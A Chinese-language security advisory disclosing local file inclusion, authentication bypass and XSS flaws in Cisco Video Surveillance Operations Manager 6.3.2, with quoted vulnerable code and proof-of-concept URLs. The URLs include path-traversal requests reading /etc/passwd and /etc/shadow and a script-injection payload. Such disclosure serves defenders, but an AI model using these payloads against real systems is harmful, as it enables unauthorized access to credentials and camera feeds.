Cisco Video Surveillance Operations Manager多个安全漏洞


发布日期:2013-03-13
更新日期:2013-03-14

受影响系统:
Cisco Video Surveillance Operations Manager 6.3.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58476
 
Cisco Video Surveillance Operations Manager是企业级视频配置和管理解决方案。
 
Cisco Video Surveillance Operations Manager 6.3.2及其他版本在实现上存在多个本地文件包含漏洞、安全绕过漏洞、多个跨站脚本漏洞,攻击者可利用这些漏洞绕过某些安全限制以执行未授权操作、在浏览器中执行任意脚本代码、窃取cookie身份验证凭证、在受影响应用上下文中打开或运行任意文件。
 
1、本地文件包含漏洞:
 
read_log.jsp和read_log.dep没有验证日志文件的名称和位置,未经身份验证的远程攻击者可执行下面的脚本:
 
---------------------------------------------
 read_log.jsp:
 /usr/BWhttpd/root/htdocs/BWT/utils/logs
 from /usr/BWhttpd/logs/<%= logName %>
 ---------------------------------------------
 ---------------------------------------------
 read_log.dep
 
<%!
 protected LinkedList getBwhttpdLog( String logName, String theOrder ) {
                String logPath  = "/usr/BWhttpd/logs/";
                String theLog  = logPath + logName;
                LinkedList resultList = new LinkedList();
                try {
 BufferedReader in = new BufferedReader(new FileReader(theLog));
                                String theLine = "";
 while( (theLine = in.readLine()) != null ) { if( theOrder.indexOf("descending") > -1 ) { resultList.addFirst
 
(theLine);
                                                } else {
 resultList.addLast(theLine);
                                                }
                                        }
 -----------------------------------------------
 POC:
 
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
 http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
 

2、本地文件包含漏洞:
 
select和display日志没有验证日志文件名,如果攻击者通过http post 请求绕过/etc/passwd,系统会将其显示为日志文件。
 
POC:
 
http://serverip/monitor/logselect.php
 
3、Cisco Video Surveillance Operations Manager Version 6.3.2没有对management和view控制台执行正确的身份验证,远程攻击者可不经身份验证访问系统并查看附带的摄像机。
 
POC:
 
http://serverip/broadware.jsp
 
4、XSS漏洞:
 
Web应用没有对多数页面执行输入和输出检查,存在XSS攻击漏洞。
 
POC: http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>
 
<*来源:b.saleh
 
  链接:http://seclists.org/bugtraq/2013/Mar/79
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&amp;amp;log=../../../../../../../../../etc/passwd
 http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&amp;amp;log=../../../../../../../../../etc/shadow
 http://www.example.com/monitor/logselect.php
 http://www.example.com/broadware.jsp
 http://www.example.com/vsom/index.php/&quot;/title&amp;gt;&amp;lt;script&amp;gt;alert
 
(&quot;ciscoxss&quot;);&amp;lt;/script&amp;gt;

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Cisco
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.cisco.com/en/US/products/ps9153/index.html

相关内容